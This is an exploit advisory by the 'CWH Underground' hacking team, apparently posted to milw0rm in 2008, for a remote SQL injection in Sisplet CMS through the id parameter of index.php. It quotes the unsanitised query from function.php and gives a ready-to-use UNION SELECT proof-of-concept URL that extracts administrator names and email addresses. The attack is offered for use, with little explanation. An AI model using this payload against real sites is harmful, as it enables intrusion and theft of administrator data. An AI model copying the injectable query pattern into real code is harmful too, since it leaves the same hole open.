59 lines
No EOL
1.6 KiB
Text
59 lines
No EOL
1.6 KiB
Text
=================================================================
|
|
Sisplet CMS (index.php id) Remote SQL Injection Vulnerability
|
|
=================================================================
|
|
|
|
,--^----------,--------,-----,-------^--,
|
|
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
|
|
`+---------------------------^----------|
|
|
`\_,-------, _________________________|
|
|
/ XXXXXX /`| /
|
|
/ XXXXXX / `\ /
|
|
/ XXXXXX /\______(
|
|
/ XXXXXX /
|
|
/ XXXXXX /
|
|
(________(
|
|
`------'
|
|
|
|
|
|
AUTHOR : CWH Underground
|
|
DATE : 1 July 2008
|
|
SITE : cwh.citec.us
|
|
|
|
|
|
#####################################################
|
|
APPLICATION : Sisplet CMS
|
|
VERSION : 2008-01-24
|
|
VENDOR : http://cms.sisplet.org/
|
|
DOWNLOAD : http://downloads.sourceforge.net/sisplet/SiSplet-2008-01-24.zip
|
|
#####################################################
|
|
|
|
--- Remote SQL Injection ---
|
|
|
|
** Magic Quote must turn off **
|
|
|
|
-----------------------------------
|
|
Vulnerable File (function.php)
|
|
-----------------------------------
|
|
|
|
$sql = mysql_query("SELECT parent FROM menu WHERE id = '$id'");
|
|
|
|
|
|
---------
|
|
Exploit
|
|
---------
|
|
|
|
[+] http://[Target]/[sisplet_path]/index.php?fl=0&p1=1&p2=15&id=[SQL Injection]
|
|
|
|
|
|
------
|
|
POC
|
|
------
|
|
|
|
[+] http://[Target]/[sisplet_path]/index.php?fl=0&p1=1&p2=15&id=15'/**/AND/**/1=2/**/UNION/**/SELECT/**/concat(ime,0x3a,priimek,0x3a,email),2,3,4/**/FROM/**/administratorji/**/WHERE/**/tip='0
|
|
|
|
|
|
##################################################################
|
|
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #
|
|
##################################################################
|
|
|
|
# milw0rm.com [2008-07-01] |